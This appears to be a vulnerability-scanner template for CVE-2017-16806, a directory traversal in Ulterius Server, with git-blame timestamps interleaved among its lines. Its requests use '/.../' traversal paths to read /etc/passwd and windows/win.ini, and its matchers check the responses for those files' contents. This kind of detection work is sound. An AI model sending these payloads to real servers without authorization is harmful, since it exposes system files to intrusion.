2021-07-06 19:50:32 +00:00
id : CVE-2017-16806
info :
name : Ulterius Server < 1.9.5.0 - Directory Traversal
author : geeknik
2022-04-22 10:38:41 +00:00
severity : high
2022-05-17 09:18:12 +00:00
description : Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
2022-04-21 21:16:41 +00:00
reference :
- https://www.exploit-db.com/exploits/43141
- https://nvd.nist.gov/vuln/detail/CVE-2017-16806
2022-05-17 09:18:12 +00:00
- https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
- https://www.exploit-db.com/exploits/43141/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-16806
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.07055
cpe : cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : ulterius
product : ulterius_server
tags : cve2017,ulterius,traversal,edb,cve
2021-07-06 19:50:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-06 19:50:32 +00:00
- method : GET
path :
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
matchers-condition : and
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2021-07-06 19:50:32 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-06 19:50:32 +00:00
- "\\[(font|extension|file)s\\]"
2021-08-19 12:30:14 +00:00
condition : or
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200